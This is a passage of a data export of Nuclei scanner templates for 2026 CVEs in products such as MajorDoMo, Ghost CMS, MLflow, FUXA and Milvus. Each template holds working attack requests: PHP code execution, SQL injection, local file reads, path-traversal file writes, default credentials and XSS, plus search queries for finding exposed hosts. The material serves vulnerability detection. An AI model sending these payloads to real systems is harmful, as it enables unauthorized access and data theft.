\"Command:\"\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022052c1b6d6dfdfea88e8e8bc352d90aaf416e7153e15284311b99ee4d869a7acf902207f2558e65caaea41ab90c277acc2fff28fb3f63d61eacfb87b4d6ec9c7568c60:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-27176.yaml","vuln_id":"cve-2026-27176"},{"raw":"id: CVE-2026-27174\n\ninfo:\n  name: MajorDoMo - Unauthenticated RCE\n  author: 0x_Akoko\n  severity: critical\n  description: |\n   MajorDoMo contains a remote code execution caused by an include order bug and lack of exit after redirect in admin panel's PHP console, letting unauthenticated attackers execute arbitrary PHP code via crafted GET requests.\n  impact: |\n   Unauthenticated attackers can execute arbitrary PHP code remotely, potentially leading to full system compromise.\n  remediation: |\n   Update to the latest version with the fix for the include order bug and proper exit after redirect.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-27174\n    - https://github.com/sergejey/majordomo/issues/1177\n    - https://chocapikk.com/posts/2026/majordomo-revisited\n    - https://www.vulncheck.com/advisories/majordomo-unauthenticated-remote-code-execution-via-admin-console-eval\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\n    cvss-score: 10.0\n    cve-id: CVE-2026-27174\n    epss-score: 0.06996\n    epss-percentile: 0.93867\n    cwe-id: CWE-94\n    cpe: cpe:2.3:a:sergejey:majordomo:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: sergejey\n    product: majordomo\n    fofa-query: body=\"templates/application.html\"\n    shodan-query: http.html:\"templates/application.html\"\n  tags: cve,cve2026,rce,majordomo,php,unauth,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 200\"\n          - \"contains_all(body, 'MajordomoSL', 'templates/application.html', 'majordomo')\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /admin.php?ajax_panel=1&op=console&command=echo+file_get_contents%28%27%2Fetc%2Fpasswd%27%29%3B HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:[x*]:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100bf7bade5f26d4561fabaf16080d9d6c2c8e962e551a798866b09556e0b2decf30220624d5ab5172b3b62adab2abb7730df35f87c7a8bf4684e2c3023e65b57a7bb5e:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-27174.yaml","vuln_id":"cve-2026-27174"},{"raw":"id: CVE-2026-2699\n\ninfo:\n  name: Progress ShareFile Storage Zones Controller - Authentication Bypass\n  author: DhiyaneshDk\n  severity: critical\n  description: |\n    Customer Managed ShareFile Storage Zones Controller (SZC) contains an authentication bypass (Execution After Redirect) that allows unauthenticated attackers to access restricted configuration pages. This leads to changing system configuration and potential remote code execution.\n  impact: |\n    Unauthenticated attackers can change system configuration and potentially execute remote code, leading to full system compromise.\n  remediation: Update ShareFile Storage Zones Controller to version 5.12.4 or later.\n  reference:\n    - https://github.com/watchtowrlabs/watchTowr-vs-Progress-ShareFile-CVE-2026-2699\n    - https://labs.watchtowr.com/youre-not-supposed-to-sharefile-with-everyone-progress-sharefile-pre-auth-rce-chain-cve-2026-2699-cve-2026-2701/\n    - https://docs.sharefile.com/en-us/storage-zones-controller/5-0/security-vulnerability-feb26\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-2699\n    cwe-id: CWE-284\n    epss-score: 0.59506\n    epss-percentile: 0.99082\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: progress\n    product: sharefile_storage_zones_controller\n    fofa-query: title==\"ShareFile Storage Server\"\n    shodan-query: title:\"ShareFile Storage Server\"\n  tags: cve,cve2026,progress,sharefile,auth-bypass,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"ShareFile Storage Server\"\n        internal: true\n\n  - raw:\n      - |\n        GET /ConfigService/Admin.aspx HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 302'\n          - 'content_length >= 10000'\n        condition: and\n# digest: 4a0a00473045022040a0571b6309256304115ae36a4a4ad0d585733faa0d2a6c19edfa6d9ce31e0f022100a47db71d006520dc185ff794d27fc4426888df9a5a124a3d7a76d1a4fe0cba95:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-2699.yaml","vuln_id":"cve-2026-2699"},{"raw":"id: CVE-2026-26980\n\ninfo:\n  name: Ghost CMS Content API - SQL Injection\n  author: domwhewell-sage\n  severity: critical\n  description: |\n    Ghost CMS before 6.19.1 is vulnerable to a blind SQL injection in the /ghost/api/content/tags/ endpoint via the filter parameter. This template checks for the vulnerability by sending a boolean-based payload.\n  impact: |\n    An unauthenticated attacker can extract arbitrary data from the Ghost database including user credentials, API keys, and all content, potentially leading to full compromise of the CMS.\n  remediation: |\n    Upgrade Ghost CMS to version 6.19.1 or later which uses parameterized queries for slug filter ordering.\n  reference:\n    - https://github.com/TryGhost/Ghost/security/advisories/GHSA-w52v-v783-gw97\n    - https://github.com/TryGhost/Ghost/commit/30868d632b2252b638bc8a4c8ebf73964592ed91\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-26980\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L\n    cvss-score: 9.4\n    cve-id: CVE-2026-26980\n    epss-score: 0.70208\n    epss-percentile: 0.9935\n    cwe-id: CWE-89\n    cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:*\n  metadata:\n    verified: true\n    max-request: 5\n    vendor: ghost\n    product: ghost\n    framework: node.js\n    shodan-query: http.component:\"Ghost\"\n    fofa-query: app=\"Ghost\"\n  tags: cve,cve2026,ghost,ghostcms,sqli,vuln,vkev\n\nflow: |\n  http(1) && http(2) && http(3)\n\nhttp:\n  - id: extract-api-key\n    method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    host-redirects: true\n    max-redirects: 2\n\n    extractors:\n      - type: regex\n        name: api_key\n        part: body\n        group: 1\n        regex:\n          - 'data-key=\"([a-f0-9]{20,})\"'\n        internal: true\n\n  - id: extract-first-slug\n    method: GET\n    path:\n      - \"{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:-null\"\n\n    extractors:\n      - type: json\n        part: body\n        name: first_slug\n        json:\n          - '.tags[0].slug'\n        internal: true\n\n  - id: check-sqli\n    method: GET\n    path:\n      - \"{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=1 THEN 0 ELSE EXP(710) END||',{{first_slug}}]\"\n      - \"{{BaseURL}}/ghost/api/content/tags/?key={{api_key}}&filter=slug:['||CASE WHEN 1=0 THEN 0 ELSE EXP(710) END||',{{first_slug}}]\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"len(body_1) != len(body_2)\"\n# digest: 4a0a004730450220652a45deaaf661e408abc9b682a99885e75803dcff4efded2a2eab4136786d03022100bd6f7e775d3609e410a1d8ef62a6a34a4ee6a42e05ade6513fed166ec3ae9073:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-26980.yaml","vuln_id":"cve-2026-26980"},{"raw":"id: CVE-2026-2652\n\ninfo:\n  name: MLflow < 3.10.0 - Authentication Bypass on FastAPI Routes\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    A vulnerability in mlflow/mlflow versions 3.9.0 and earlier allows unauthenticated access to certain FastAPI routes when the server is started with authentication enabled (`--app-name basic-auth`) and served via uvicorn (ASGI). The FastAPI permission middleware only enforces authentication on `/gateway/` routes, leaving other routes such as the Job API (`/ajax-api/3.0/jobs/*`) and the OpenTelemetry trace ingestion API (`/v1/traces`) unprotected. This allows unauthenticated remote attackers to submit jobs, read job results, cancel running jobs, and inject arbitrary trace data into experiments. The issue arises from an architectural mismatch between Flask and FastAPI authentication mechanisms, where the `_find_fastapi_validator()` function fails to handle non-`/gateway/` paths, resulting in a complete authentication bypass. This vulnerability is fixed in version 3.10.0.\n  impact: |\n    An unauthenticated attacker can bypass authentication to access job management APIs and inject arbitrary trace data, potentially leading to data integrity compromise and unauthorized job execution.\n  remediation: |\n    Upgrade MLflow to version 3.10.0 or later.\n  reference:\n    - https://huntr.com/bounties/5aeff5f0-49c7-4180-b5cb-c9a046f16756\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-2652\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L\n    cvss-score: 8.6\n    cve-id: CVE-2026-2652\n    epss-score: 0.20783\n    epss-percentile: 0.97434\n    cwe-id: CWE-306\n    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: lfprojects\n    product: mlflow\n    shodan-query: http.title:\"mlflow\"\n    fofa-query: app=\"mlflow\"\n  tags: cve,cve2026,mlflow,auth-bypass,lfprojects,vuln,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /api/2.0/mlflow/experiments/list HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 401'\n        internal: true\n\n  - raw:\n      - |\n        POST /ajax-api/3.0/jobs/search HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(body, \"\\\"jobs\\\":\")\n          - contains(content_type, 'application/json')\n        condition: and\n# digest: 4a0a00473045022100ac5c58fa6adaf9d8e072426b9f1dd3495a5c6ac4343e44bae5b298b3893cd9d5022042270e43bdf242897c8307444d5c3276c11b54ce2455bb44b449c1d51cde2e6e:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-2652.yaml","vuln_id":"cve-2026-2652"},{"raw":"id: CVE-2026-26341\n\ninfo:\n  name: Tattile Camera < 1.181.5 - Default Login\n  author: 0x_Akoko\n  severity: high\n  description: |\n   Tattile Smart+, Vega, and Basic device families firmware <= 1.181.5 contain a broken authentication caused by default credentials not forced to be changed, letting attackers with management interface access gain administrative privileges.\n  impact: |\n   Attackers can gain administrative access to device configuration and data, leading to unauthorized control and data exposure.\n  remediation: |\n   Update firmware to a version later than 1.181.5 or the latest available version.\n  reference:\n    - https://www.cve.org/CVERecord?id=CVE-2026-26341\n  classification:\n    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\n    cvss-score: 9.3\n    cve-id: CVE-2026-26341\n    epss-score: 0.02663\n    epss-percentile: 0.8505\n    cwe-id: CWE-1392\n    cpe: cpe:2.3:o:tattile:smart\\+_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: http.html:\"Tattile camera manager\"\n    fofa-query: icon_hash==\"2030104257\"\n  tags: cve,cve2026,tattile,default-login,camera,iot\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(body, \"Tattile camera manager\")\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /api/v1/security/login HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Basic c3VwZXJ1c2VyOnN1cGVydXNlcg==\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(content_type, \"text/plain\")\n          - regex(\"^[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}$\", body)\n        condition: and\n# digest: 4a0a00473045022100e09d980acd0d61da16525c1319fe471137a862584e47db4998f3dbc12b0d8f8f0220669fc57990405893fb4386b5d91f32caf7dc2022164bc033569d59302c18f733:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-26341.yaml","vuln_id":"cve-2026-26341"},{"raw":"id: CVE-2026-26265\n\ninfo:\n  name: Discourse - Private User Field Disclosure via Directory Items IDOR\n  author: str4k3r\n  severity: high\n  description: |\n    Discourse prior to 2025.12.2, 2026.1.1, and 2026.2.0 contains an IDOR vulnerability caused by lack of authorization checks on user_field_ids parameter in DirectoryItemsController#index, letting any user retrieve private user field values, exploit requires no authentication.\n  impact: |\n    Any user, including anonymous, can bulk exfiltrate private user data such as phone numbers and addresses.\n  remediation: |\n    Update to versions 2025.12.2, 2026.1.1, or 2026.2.0 or later.\n  reference:\n    - https://github.com/discourse/discourse/security/advisories/GHSA-crxf-p6jm-vpgw\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-26265\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-26265\n    epss-score: 0.00877\n    epss-percentile: 0.57491\n    cwe-id: CWE-639\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: discourse\n    product: discourse\n    shodan-query: http.component:\"Discourse\"\n    fofa-query: app=\"Discourse\"\n    zoomeye-query: app:\"Discourse\"\n    hunter-query: web.title=\"Discourse\"\n  tags: cve,cve2026,discourse,idor,exposure,unauth\n\nflow: |\n  http(1);\n  var id = template[\"uf_id\"];\n  if (Array.isArray(id)) set(\"uf_id\", id[0]);\n  if (template[\"uf_id\"]) http(2);\n\nhttp:\n  - raw:\n      - |\n        GET /site.json HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(body, \"user_fields\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        name: uf_id\n        internal: true\n        part: body\n        group: 1\n        regex:\n          - '\"id\":(\\d+)[^{}]*?\"show_on_(?:profile|user_card)\":false'\n\n  - raw:\n      - |\n        GET /directory_items.json?period=all&user_field_ids={{uf_id}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"json\")'\n          - 'contains(body, \"\\\"user_fields\\\":{\\\"\" + uf_id + \"\\\":\")'\n        condition: and\n# digest: 4b0a004830460221009631975f226bbce14cc0494fb71529551f6f09195d9663d6b4d727729bfb4aa6022100805a81fef71e8f335f931d5309e0c4c1777ee945171dcce68c669dc599862ae2:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-26265.yaml","vuln_id":"cve-2026-26265"},{"raw":"id: CVE-2026-26217\n\ninfo:\n  name: Crawl4AI < 0.8.0 - Local File Inclusion\n  author: str4k3r,Aryu-RU\n  severity: critical\n  description: |\n    The Crawl4AI Docker API endpoints accepted arbitrary URL schemes without an allow-list. An unauthenticated request with a file:// URL could read local files. Fixed in 0.8.0, which restricts accepted URL schemes.\n  impact: |\n    Unauthenticated remote attackers can read sensitive files, exposing credentials, API keys, and internal application details.\n  remediation: |\n    Update to version 0.8.0 or later.\n  reference:\n    - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-vx9w-5cx4-9796\n  classification:\n    cve-id: CVE-2026-26217\n    epss-score: 0.01914\n    epss-percentile: 0.78936\n  metadata:\n    verified: true\n    shodan-query: title:\"Crawl4AI\"\n    fofa-query: title=\"Crawl4AI\"\n  tags: cve,cve2026,crawl4ai,lfi,file-read\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}\"\n\n    redirects: true\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(tolower(body), \"crawl4ai\")'\n        internal: true\n\n  - method: POST\n    path:\n      - \"{{BaseURL}}/execute_js\"\n      - \"{{BaseURL}}/html\"\n    headers:\n      Content-Type: application/json\n    body: '{\"url\": \"file:///etc/passwd\", \"scripts\": [\"document.body.innerText\"]}'\n\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 490a004630440220293498f391eec611b8c3a6d3f539c82452e2ae6ec6fa876d308644d3cc66a6f0022057bb83d630d8e8bd8be7dd8d883afc4db0c2e738bff50b4dd58e76bcaea5e2be:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-26217.yaml","vuln_id":"cve-2026-26217"},{"raw":"id: CVE-2026-26190\n\ninfo:\n  name: Milvus - Unauthenticated Metrics API Access\n  author: WRG-11\n  severity: critical\n  description: |\n    Milvus < 2.5.27 and < 2.6.10 contains an authentication bypass caused by weak default token and unauthenticated REST API on TCP port 9091, letting attackers perform arbitrary expression evaluation and data manipulation, exploit requires network access to port 9091.\n  impact: |\n    Attackers can bypass authentication to execute arbitrary expressions and manipulate data, risking full system compromise.\n  remediation: |\n    Update to versions 2.5.27 or 2.6.10 or later.\n  reference:\n    - https://github.com/milvus-io/milvus/security/advisories/GHSA-7ppg-37fh-vcr6\n    - https://github.com/advisories/GHSA-7ppg-37fh-vcr6\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-26190\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-26190\n    epss-score: 0.36912\n    epss-percentile: 0.98441\n    cwe-id: CWE-306\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: milvus\n    product: milvus\n    shodan-query: 'http.html:\"404 page not found\" port:\"9091\"'\n  tags: cve,cve2026,milvus,auth-bypass,unauth,vkev\n\nvariables:\n  num1: \"{{rand_int(40000, 44800)}}\"\n  num2: \"{{rand_int(40000, 44800)}}\"\n  result: \"{{to_number(num1)*to_number(num2)}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /expr?auth={{randstr}}&code={{num1}}*{{num2}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'the expr auth is invalid'\n        internal: true\n\n  - raw:\n      - |\n        GET /expr?auth=by-dev&code={{num1}}*{{num2}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"output\":\"{{result}}\"'\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100f9fa0413d36628640ca270da6ff0820947fc971d65955417c4b26047f048b448022062908f64bcdb3665abdad4ed600b1d854d4ffb21dfd454dfdce5645f3a6bd04c:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-26190.yaml","vuln_id":"cve-2026-26190"},{"raw":"id: CVE-2026-2614\n\ninfo:\n  name: MLflow <= 3.9.0 - Arbitrary File Read\n  author: str4k3r\n  severity: high\n  description: |\n    mlflow mlflow <= 3.9.0 contains a path traversal caused by bypassing source path validation via the mlflow.prompt.is_prompt tag in CreateModelVersion request, letting unauthenticated remote attackers read arbitrary files.\n  impact: |\n    Unauthenticated attackers can read arbitrary files on the server, leading to complete confidentiality compromise.\n  remediation: |\n    Upgrade to version 3.10.0 or later.\n  reference:\n    - https://github.com/mlflow/mlflow/security/advisories\n    - https://github.com/mlflow/mlflow/commit/6e801f4259d96804c73107315b24cef0f6aa115a\n    - https://huntr.com/bounties/19380271-3fbf-4beb-987e-6fd7069c55e6\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-2614\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2026-2614\n    epss-score: 0.03608\n    epss-percentile: 0.88959\n    cwe-id: CWE-22\n  metadata:\n    max-request: 3\n    verified: true\n    vendor: mlflow\n    product: mlflow\n    shodan-query: title:\"MLflow\"\n  tags: cve,cve2026,mlflow,lfi,traversal,vkev\n\nvariables:\n  model: \"{{to_lower(rand_base(10))}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/2.0/mlflow/registered-models/create HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"name\":\"{{model}}\"}\n\n      - |\n        POST /api/2.0/mlflow/model-versions/create HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"name\":\"{{model}}\",\"source\":\"file:///etc/\",\"tags\":[{\"key\":\"mlflow.prompt.is_prompt\",\"value\":\"true\"}]}\n\n      - |\n        GET /model-versions/get-artifact?name={{model}}&version=1&path=passwd HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100a9a7c9ed2a7ec41b0d7f4baf7e0f82a8f818f38b49aef2b657a36e4ad20ca648022100c9f59afc36b53ce20bc716a6003e8ff3950d9d7cb776c0aabae2752eaf684a4e:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-2614.yaml","vuln_id":"cve-2026-2614"},{"raw":"id: CVE-2026-25895\n\ninfo:\n  name: FUXA <= 1.2.9 - Unauthenticated Path Traversal to Arbitrary File Write\n  author: prithvee07\n  severity: critical\n  description: |\n    FUXA, an open-source Node.js SCADA/HMI web interface, through version 1.2.9 exposes an unauthenticated POST /api/upload endpoint that resolves the attacker-controlled `destination` field from the JSON request body against the application directory with only a leading underscore prefix and no containment check. Because path.resolve() honours \"../\" segments, an unauthenticated attacker can escape the application directory and write arbitrary files anywhere on the filesystem reachable by the service account - for example into the public web root (a/../../client/dist), into cron directories, or over SSH authorized_keys - leading to remote code execution. Version 1.2.10 rejects any destination containing a traversal segment and additionally requires an authenticated administrator.\n  impact: |\n    Unauthenticated attackers can write arbitrary files anywhere on the filesystem reachable by the service account, including the public web root, cron directories, and SSH authorized_keys, leading to full remote code execution on the host running FUXA.\n  remediation: |\n    Upgrade FUXA to version 1.2.10 or later, which validates and contains the `destination` parameter to the intended application directory and requires administrator authentication on /api/upload.\n  reference:\n    - https://github.com/frangoteam/FUXA/security/advisories/GHSA-88qh-cphv-996c\n    - https://github.com/frangoteam/FUXA/commit/22c2192f5d9beef8a787c45eff3a14c24dbb5f96\n    - https://github.com/frangoteam/FUXA/releases/tag/v1.2.10\n    - https://github.com/Hann1bl3L3ct3r/FUXAPWN\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-25895\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-25895\n    epss-score: 0.11195\n    epss-percentile: 0.95756\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: frangoteam\n    product: fuxa\n    shodan-query: http.title:\"FUXA\"\n    fofa-query: title=\"FUXA\"\n  tags: cve,cve2026,fuxa,scada,path-traversal,file-upload,rce,unauth,vkev\n\nvariables:\n  filename: \"{{rand_base(10,'abcdefghijklmnopqrstuvwxyz')}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/upload HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"resource\":{\"name\":\"{{filename}}.txt\",\"fullPath\":\"{{filename}}.txt\",\"type\":\"bin\",\"data\":\"{{base64(filename)}}\"},\"destination\":\"a/../../server/main.js\"}\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 400'\n          - 'contains(body, \"ENOTDIR\")'\n          - 'contains(body, concat(\"main.js\", \"/\", \"{{filename}}.txt\"))'\n        condition: and\n\n      - type: word\n        part: body\n        words:\n          - \"invalid_destination\"\n        negative: true\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - \"open '(.*?)'\"\n# digest: 4a0a00473045022100ea6d4d3ecdc4283fe5bbe138d5a612a6486f2f8f9e3271a256e005df1b04057602200726dad877ef2c7c0803defad789673fedc8a735531110a7627b597c1a48c764:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2026/CVE-2026-25895.yaml","vuln_id":"cve-2026-25895"},{"raw":"id: CVE-2026-25892\n\ninfo:\n  name: Adminer 4.6.2 - 5.4.1 Unauthenticated Persistent DoS\n  author: DhiyaneshDk\n  severity: high\n  description: |\n    Adminer <= 5.4.1 contains a denial of service caused by lack of origin validation in version check endpoint, letting attackers trigger server errors via crafted POST requests, exploit requires no special privileges.\n  impact: |\n    Attackers can cause server errors resulting in denial of service for all users.\n  remediation: Upgrade to Adminer 5.4.2 or later.\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n    cvss-score: 7.5\n    cwe-id: CWE-20\n    epss-score: 0.01586\n    epss-percentile: 0.7451\n  reference:\n    - https://github.com/vrana/adminer/security/advisories/GHSA-q4f2-39gr-45jh\n    - https://github.com/vrana/adminer/commit/21d3a3150388677b18647d68aec93b7850e457d3\n  metadata:\n    verified: true\n    max-request: 3\n    vendor: adminer\n    product: adminer\n    fofa-query: 'title=\"Adminer\" || body=\"Adminer\"'\n    shodan-query: 'http.title:\"Adminer\"'\n  tags: cve,cve2026,adminer,passive\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/adminer.php'\n      - '{{BaseURL}}/editor.php'\n      - '{{BaseURL}}/adminer/'\n\n    headers:\n      Accept-Language: en-US,en;q=0.5\n    stop-at-first-match: true\n\n    redirects: true\n\n    extractors:\n      - type: regex\n        name: version\n        part: body\n        group: 1\n        regex:\n          - '<span class=\"version\">([0-9.]+)'\n          - 'amp;version=([0-9.]+)'\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"Adminer</title>\"\n          - \"Adminer</a>\"\n        condition: or\n\n      - type: status\n        status:\n          - 200\n\n      - type: dsl\n        dsl:\n          - 'compare_versions(version, \">=4.6.2\", \"<=5.4.1\")'\n# digest: 490a0046304402203111175888c07c00177315a2a5ee7cbf10091886f7bbdd6e49d88e7d153a32ec022021f89ec19fb8827356a81208667c7b061e8e651bd5272761c5c287d58d8cbe1f:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2026/CVE-2026-25892.yaml","vuln_id":"cve-2026-25892"},{"raw":"id: CVE-2026-25616\n\ninfo:\n  name: Blesta <= 5.13.1 - Cross-Site Scripting\n  author: 0x_Akoko\n  severity: medium\n  description: |\n   Blesta 3.x through 5.x before 5.13.3 contains an input validation vulnerability caused by mishandling input, letting attackers potentially exploit the system, exploit requires unspecified conditions.\n  impact: |\n   Attackers can exploit input validation flaws to cause unexpected behavior or security issues.\n  remediation: |\n   Upgrade to version 5.13.3 or later.\n  reference:\n    - https://karmainsecurity.com/KIS-2026-01\n    - https://www.blesta.com/2026/01/28/security-advisory/\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-25616\n  classification:\n    cve-id: CVE-2026-25616\n    epss-score: 0.00392\n    epss-percentile: 0.33137\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cwe-id: CWE-79\n  metadata:\n    max-request: 1\n    verified: true\n    shodan-query: http.title:\"Blesta\"\n    fofa-query: app=\"Blesta\"\n  tags: cve,cve2026,blesta,xss\n\nhttp:\n  - raw:\n      - |\n        GET /client_dialog/confirm/?confirm_url=javascript:alert(document.domain) HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'action=\"javascript:alert(document.domain)\"'\n          - '<form method=\"post\"'\n        condition: and\n\n      - type: word\n        part: content_type\n        words:\n          - text/html\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100f5b81e9c8c82ae2fee200c2a819fb94a2bb05c6ba31617b061b7c7a3338e2f3802204e581a11c01b3da08c913825dd4aae9843d2d13f415bb8963eb7493413e7e836:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2026/CVE-2026-25616.yaml","vuln_id":"cve-2026-25616"},{"raw":"id: CVE-2026-25555\n\ninfo:\n  name: OpenBullet2 <= 0.3.2 - Authentication Bypass\n  author: 0x_Akoko\n  severity: critical\n  description: |\n   OpenBullet2 <= 0.3.2 contains an authentication bypass caused by improper API key authentication middleware handling empty X-Api-Key header, letting unauthenticated attackers gain admin access, exploit requires sending empty X-Api-Key header.\n  impact: |\n   Unauthenticated attackers can gain full admin access, compromising the entire system and API endpoints.\n  remediation: |\n    Update to a version later than 0.3.2 or the latest available version.\n  reference:\n    - https://hackernoon.com/one-empty-header-to-admin-how-an-auth-bypass-breaks-openbullet2\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-25555\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2026-25555\n    epss-score: 0.01824\n  